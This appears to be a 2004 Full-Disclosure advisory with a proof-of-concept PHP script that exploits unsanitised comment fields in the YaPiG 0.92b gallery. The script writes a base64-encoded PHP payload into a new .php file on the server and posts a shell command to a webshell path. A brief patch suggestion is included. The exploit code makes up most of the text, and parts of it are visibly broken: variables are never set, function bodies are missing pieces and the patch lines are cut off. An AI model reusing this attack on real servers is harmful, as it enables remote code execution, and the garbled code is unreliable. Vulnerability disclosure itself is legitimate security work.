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[Full-Disclosure] YaPiG 0.92b add_coment PHP Insertion Proof of Concept




        YaPiG 0.92b add_coment PHP Insertion Proof of Concept
        By aCiDBiTS    acidbits@xxxxxxxxxxx    07-August-2004


        YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script.
        This Proof of Concept creates a php file that echoes a notice.
        First it determines a valid photo directory where to create the script.
        Then creates a crafted comment saved in a new .php file. This comment
        contains an encoded webshell.   Once this .php file is opened, the code
        contained creates test.php.

        Usage (in my debian box):
        php4 -q yapig_addc_poc.php "";


There is no user input sanization of some parameters in add_comment.php
and functions.php.This allows to create a file with any extension, and we can
insert any code in it. Version 0.92b is vulnerable, I haven't tested older ones.

Workaround. Modify this lines of code:

        line 105:
                $comments_file= $gid_dir . $gid . "_" . $phid;
        Modify with:
                $comments_file= $gid_dir . $gid . "_" . intval($phid);

        functions.php, construct_comment_line()
        line 699-700:
                $linea=$linea . $data_array['mail'] . $SEPARATOR;
                $linea=$linea . $data_array['web'] . $SEPARATOR;
        Modify with:
                $linea=$linea . htmlspecialchars($data_array['mail']) . 
                $linea=$linea . htmlspecialchars($data_array['web']) . 


echo "+-------------------------------------------------------+\n| YaPiG 0.92b add_coment PHP Insertion Proof of Concept |\n| By aCiDBiTS acidbits@xxxxxxxxxxx 07-August-2004 |\n+-------------------------------------------------------+\n\n";

$websh="<?php \$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcyBnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f); ?>";

if($argc<2)  die("Usage: ".$argv[0]." URL_to_YaPiG_script\n\n");
if(substr($host,strlen($host)-1,1)!='/') $host.='/';

echo "[+] Getting valid gid & photo path ... ";
if( !$gid || !$path ) die( "Failed!\n\n");
echo "OK\n    GID: $gid\n    Path: ".$host."photos/".$path."/\n\n";

echo "[+] Creating notice script file ... ";
send_post( $host."add_comment.php?gid=".$gid."&phid=.php", "tit=a&aut=a&mail=".urlencode($websh)."&web=&msg=a&date=&send=Send");
$webc=get_web( $host."photos/".$path."/".$gid."_.php" );
send_post( $host."photos/".$path."/acidwebshell.php", "c=".urlencode("rm ".$gid."_.php") );
echo "OK\n Now go to: ".$host."photos/".$path."/test.php";

die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\ //||\\\\\n\n");

function get_web($url) { $ch=curl_init(); curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_HEADER, 0); curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1); $data=curl_exec ($ch); curl_close ($ch); return $data; }

function send_post($url,$data)
        curl_setopt ($ch, CURLOPT_URL, $url );
        curl_setopt ($ch, CURLOPT_HEADER, 0);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
        curl_setopt ($ch, CURLOPT_POST, 1);
        curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
        $data=curl_exec ($ch);
        curl_close ($ch);
        return $data;

/*              \    /
               //||\\    */


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